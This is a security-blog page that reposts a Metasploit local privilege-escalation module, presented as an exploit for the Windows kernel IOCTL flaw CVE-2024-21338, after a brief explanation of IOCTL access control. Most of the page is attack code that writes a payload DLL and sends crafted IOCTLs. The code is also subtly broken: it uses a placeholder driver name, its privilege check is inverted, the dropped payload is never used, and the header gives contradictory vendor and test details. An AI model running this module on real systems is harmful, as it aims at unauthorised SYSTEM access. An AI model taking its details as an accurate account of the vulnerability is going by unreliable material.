Latest Tech

Latest Posts

Microsoft Windows 10.0.17763.5458 Kernel IOCTL Access Control

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 181
Microsoft Windows 10.0.17763.5458 Kernel IOCTL Access Control
Microsoft Windows 10.0.17763.5458 Kernel IOCTL Access Control
Microsoft Windows 10.0.17763.5458, like other versions, uses I/O Control Codes Microsoft Windows 10.0.17763.5458, like other versions, uses I/O Control Codes (IOCTLs) for user-mode applications to communicate with kernel-mode device drivers.

Kernel IOCTL Access Control refers to the critical security mechanism that dictates which processes or users are authorized to invoke specific, often privileged, IOCTL functions within a driver.

A vulnerability in this area means a driver fails to properly validate the caller's security context. This oversight allows a low-privileged attacker to bypass security restrictions.

The primary risk is privilege escalation, enabling an attacker to execute arbitrary code with SYSTEM-level privileges. Robust access control checks within driver code are essential to prevent such exploits.

=============================================================================================================================================
| # Title : Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338


[+] Summary :
Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
'Description' => %q{
This module exploits an insufficient access control vulnerability in the Windows Kernel
through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
kernel-level functionality leading to privilege escalation.
[+] POC :

#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################

require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
'Description' => %q{
This module exploits an insufficient access control vulnerability in the Windows Kernel
through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
kernel-level functionality leading to privilege escalation.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
],
'Platform' => 'win',
'Arch' => [ARCH_X64],
'SessionTypes' => ['meterpreter'],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'Targets' => [
[
'Windows 10/11 x64',
{
'Arch' => ARCH_X64,
'Platform' => 'win'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'DisclosureDate' => '2024-01-09',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
])
end

def check
# Check if we're on a vulnerable system
if sysinfo['OS'] !~ /windows/i
return CheckCode::Safe('Target is not a Windows system')
end

# Check architecture
if sysinfo['Architecture'] !~ /x64/
return CheckCode::Safe('Target architecture is not supported')
end

# Check if we have necessary privileges
unless is_system?
return CheckCode::Detected('User does not have SYSTEM privileges')
end

# Verify vulnerable driver exists
device_path = datastore['DEVICE_NAME']
if device_exists?(device_path)
return CheckCode::Appears('Vulnerable device driver detected')
else
return CheckCode::Safe('Vulnerable device driver not found')
end
end

def exploit
print_status("Starting exploitation for CVE-2024-21338")

# Check target environment
unless check == CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end

# Generate payload
print_status("Generating payload...")
payload_data = generate_payload_dll

# Create temporary file for payload
temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
print_status("Writing payload to #{temp_path}")
write_file(temp_path, payload_data)
register_file_for_cleanup(temp_path)

# Execute exploitation
print_status("Triggering vulnerability via IOCTL...")
if trigger_exploit(temp_path)
print_good("Exploitation successful!")
else
fail_with(Failure::Unknown, "Exploitation failed")
end
end

private

def device_exists?(device_path)
begin
file = client.railgun.kernel32.CreateFileA(
device_path,
'GENERIC_READ',
'FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_ATTRIBUTE_NORMAL',
0
)

if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
client.railgun.kernel32.CloseHandle(file['return'])
return true
end
rescue
return false
end

false
end

def trigger_exploit(payload_path)
begin
# Open device handle
device_handle = client.railgun.kernel32.CreateFileA(
datastore['DEVICE_NAME'],
'GENERIC_READ | GENERIC_WRITE',
0,
nil,
'OPEN_EXISTING',
0,
0
)

if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
print_error("Failed to open device handle")
return false
end

# Prepare buffer for exploitation
buffer_size = 1024
input_buffer = Rex::Text.rand_text_alpha(buffer_size)

# Send vulnerable IOCTL
ioctl_result = client.railgun.kernel32.DeviceIoControl(
device_handle['return'],
datastore['IOCTL_CODE'],
input_buffer,
input_buffer.length,
nil,
0,
4,
nil
)

# Cleanup
client.railgun.kernel32.CloseHandle(device_handle['return'])

if ioctl_result['return']
print_good("IOCTL sent successfully")
return true
else
print_error("IOCTL failed")
return false
end

rescue => e
print_error("Exploitation error: #{e.message}")
return false
end
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.